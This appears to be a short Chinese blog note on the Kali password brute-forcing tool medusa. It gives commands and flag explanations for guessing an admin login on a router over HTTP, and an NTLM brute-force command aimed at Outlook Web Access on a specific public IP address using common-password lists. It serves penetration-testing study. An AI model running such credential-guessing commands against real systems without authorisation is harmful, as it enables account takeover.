Kali 百鬼夜行 medusa 简明笔记

發表於 2017-06-15   |   分類於 信息安全   |  

工具概要

类似 hydra 的用户名密码枚举工具。
https://en.kali.tools/?p=200

使用方式

1
medusa -M http -h 192.168.10.1 -u admin -P wordlist.txt -e ns -n 80 -F

说明

1
2
3
4
5
6
7
8
9
-M http 允许我们指定模块。这里,我们选择了 HTTP 模块。
-h 192.168.10.1 允许我们指定主机。这里,我们选择了 192.168.10.1 ( 路由的 IP
地址) 。
-u admin 允许我们指定用户。这里我们选择了 admin 。
-P wordlist-path 允许我们指定密码列表的位置。
-e ns 允许我们指定额外的密码检查。 ns 变量允许我们使用用户名作为密码,并
且使用空密码
-n 80 允许我们指定端口号码。这里我们选择了 80
-F 允许我们在成功找到用户名密码组合之后停止爆破

NTLM HTTP 枚举

在 攻击 OWA (Outlook Web Access) 的时候会用到

1
2
3
4
5
6
7
8
9
medusa -s
-h 101.230.222.137
-u administrator
-P ~/pentest_project/ringzer0_pass_dict/Gary_Def/top100password.txt
-M http
-m DIR:"ews"
➜  ~ medusa -s -h 101.230.222.137 -u administrator -P ~/pentest_project/ringzer0_pass_dict/Gary_Def/10k_most_common.txt -M http -m DIR:"ews" -r 5 -g 60
#渗透测试 #百鬼夜行
Kali 百鬼夜行 Nessus 简明笔记
Kali 百鬼夜行 hydra 简明笔记